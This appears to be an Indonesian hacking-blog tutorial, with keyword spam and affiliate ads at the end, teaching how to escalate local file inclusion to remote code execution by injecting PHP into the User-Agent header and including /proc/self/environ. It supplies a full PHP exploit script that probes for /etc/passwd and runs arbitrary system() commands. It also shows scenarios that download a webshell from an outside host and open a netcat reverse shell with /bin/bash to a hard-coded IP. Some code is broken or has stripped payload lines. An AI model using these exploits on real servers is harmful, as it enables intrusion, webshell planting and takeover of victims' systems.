perhatikan text yang tak tebalkan. itu adalah user agent. informasi yang di berikan oleh "browser kita" ke server. yg berarti informasi tersebut "di kirim oleh browser kita" ke server.itu muncul mozilla karena gw emang pakai mozilla firefox. info itu di kirim oleh browser ke server victim.
sekarang kita ingat hal penting dalam Hacking, pengetahuan basic dari webhacking :
"sesuatu (input,variable,script) yang di kirimkan dari browser, bisa di manipulasi melalui browser agar di proses oleh server".

Lalu apa hubunganya hal ini dengan inject environ? simple sob. Perhatikan output yang kita terima setelah kita menginclude file environ. informasi useragent dari browser kita di tampilkan oleh file ini, berarti kita bisa memanipulasi user agent ini sesuai yang kita inginkan. Salah satunya mengirimkan perintah jahat ke victim ((demit mode on)).

Untuk manipulasi header ini, ada cara yg sangat mudah, yaitu dengan menggunakan addons firefox bernama tamper. tapi saya tidak akan menggunakan cara instan seperti itu, karena kita sedang belajar. Jadi saya akan jelaskan Proof Of Concept nya semampu saya.

OK. Next --> Coding.
saya harap kalian tidak bosan sama coding. karena kita hidup di dunia 0 dan 1, jadi mau tidak mau harus selalu berususan dengan coding.

###[ HTTPQUERY pada PHP ]###
http query berfungsi untuk melakukan koneksi ke sebuah host melalui protokol http, kemudian mengambil output dari hasil query. ringkasnya httpquery bersifat seperti web browser.

$sock = fsockopen("sasaran.com","80",$errno,$errstr,30);   // lakukan koneksi ke sasaran.com port 80
$get  = "GET /index.php HTTP/1.1\r\n".    // minta file index.php (browsing membuka file index.php)
 "Host: sasaran.com\r\n".          // hostname
 "Accept: */*\r\n".                // accepted methode
 "User-Agent: Mozilla/5.0 \r\n".   // [b]USER AGENT[/B]
 "Connection: Close\r\n\r\n";      // tutup koneksi
fputs($sock,$get);                        // kirimkan request
while (!feof($sock)) {                    // ambil output yg di terima dari hasil kirim request
 $output .= trim(fgets($sock, 3600))."\n";            
}
fclose($sock);                            // tutup koneksi
echo $output;                             // tulis/cetak hasil httpquery
?>

dengan cara seperti ini, kita akan mendapatkan hasil yang sama dengan browsing menggunakan browser. bedanya kita bebas mengirimkan header http apa aja. perhatikan bagian USER AGENT. di situ saya tuliskan Mozilla/5.0. sehingga informasi browser yang di terima oleh sasaran.com adalah Mozilla/5.0. Kalau user agent saya isi dengan nama saya, maka server akan mengetahui kalau useragent adalah Qubex.

"User-Agent: ArRay \r\n"

sehingga, hasil output ke browser, akan tertulis useragent adalah Qubex.
dengan cara seperti ini, kita bisa menyisipkan malicious code ke server.

"User-Agent: Mozilla/5.0  \r\n"

dengan cara seperti itu, maka shell command uname -a dan ls -la akan di jalankan di sasaran.com dan hasilnya di cetak di browser. jadilah sebuah teknik menginjeksi yg mudah. begitulan PoC dasar dari teknik ini.

$sock = fsockopen("sasaran.com","80",$errno,$errstr,30); 
$get  = "GET /index.php HTTP/1.1\r\n". 
 "Host: sasaran.com\r\n". 
 "Accept: */*\r\n".
 "User-Agent: Mozilla/5.0 \r\n".
 "Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
 $output .= trim(fgets($sock, 3600))."\n";            
}
fclose($sock);
echo $output;
?>

dengan merubah user agent, kita bisa mengirimkan command apa saja ke server. sebuah malicious yang mudah dan menyenangkan. kita bisa merubahnya dan menjalankan satu demi satu.

seperti yang saya katakan tadi, kita akan membuat sebuah RCE. Sehingga kita bisa mengirimkan command2 ke server dengan mudah layaknya menginjeksi bug RCE, tanpa harus edit2 coding lagi. kita tinggal mengedit code tersebut menjadi lebih otomatis.

contoh berikut, saya membuat scriptnya untuk di jalankan di command line interface. dengan script berikut, saya akan mengirimkan command ke server dengan cara berikut (in CLI misanl SSH):

./lfi "http://sasaran.com/buglfi.php?example=[command-command ke server]"
./lfi "http://sasaran.com/buglfi.php?example=[uname -a; pwd; ls -la; find ./ -perm 777 -type d]"  << contoh

#!/usr/bin/php
//ambil variable
$com = str_replace('"','',$_SERVER['argv'][1]); // hilangkan petik
$sub = explode("[",$com); // pisah bug dengan command
$url = str_replace("http://","",$sub[0]); // url
$site= explode("/",$url,0); // sitename
$bug = str_replace($site."/","",$url); // bug path
$cmd = substr($sub[1],0,(str_len($sub[1])-1)); // command

//dapatkan path direktori utama
$path = '/';
while(!$mainpath){
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$path"etc/passwd HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);
if(eregi("root:",$output)){
$mainpath = $path;
}
$path .= "../";
}

// hentikan exploitasi jika tidak mendapatkan main direktori path
if(!$mainpath){
print "Failed!\r\n"; exit();
}

//injek environ
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$mainpath"proc/self/environ HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0 '.system('".$cmd."').'[XCREW]';\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);

//failed jika tidak bisa include environ/gagal
if(!eregi("[XCREW]",$output)){
print "Failed!\r\n"; exit();
}

//ambil output command
$result = explode("[XCREW]",$output);
$hasilcommand = $result[1];

print $hasilcommand."\r\n";
exit();
?>

dengan script sederhana tersebut, saya dapat RCE dari LFI.

####[ Scenario download webshell ]####

./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/bd.txt; mv bd.txt bd.php]"

Shell uploaded to http://sasaran.com/writeable/dir/bd.php

####[ Scenario backconnect ]####

./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/nc;]"
./lfi "http://sasaran.com/buglfi.php?example=[writeable/dir/nc -vv 202.212.22.11 9999 -e /bin/bash &]"

begitulah, salah satu jurus Hackin exploitasi LFI. pada teknik ini, selain belajar teknik lfi, kita juga secara tidak langsung belajar untuk mengirimkan command dengan manipulasi header http yang memanfaatkan sifat dari server. teknik seperti ini juga bisa di pakai pada bug lain yang memiliki sifat yg sama, yaitu mencetak informasi yang dikirim dari browser. karena, segala sesuatu yang di kirimkan dari browser bisa kita manipulasi sesuka kita. ini adalah hukum alam. kembangin sendiri script tersebut. sempurnain, karena itu juga asal ketik.



thanks to ArRay
Hacker Manado

Tutorial hacking,ilmu hacking,dunia hacking,web category,menjadi hacker,be hackeron facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Affiliate Network On Twitter

Tell your friends and followers about www.twitrbackgrounds.com and make money. Join the TwitterBackgrounds.com affiliate network and earn 25% commissions when your visitors purchase a personalized or custom Twitter background. You don't need your own website to Join. Simply sign up and email or tweet your friends and followers. Join instantly and start making money right now.

singkatnya,kamu tiggal buat akun di http://www.twitrbackgrounds.com
dan undang teman kamu untuk dapat komisi 25% dari keuntungan tersebut . .
gudluck

sign up now in HERE

Dapat Domain .com GRATIS

Bagi anda yang ingin membuat website tapi belum punya dana yang cukup untuk beli domain, jangan khawatir. Sekarang telah hadir domain .com yang bisa di dapat secara gratis. Dengan mendapatkan domain ini berarti anda akan bisa membuat alamat website misalnya www.namawebsiteanda.com.
Anda tidak perlu membayar sepeserpun untuk mendapatkan domain .com GRATIS....!!
Silahkan kunjungi freepremiumdomain


buat akun kalian dan dapatkan domain .com gratisnya.

semoga bermanfaat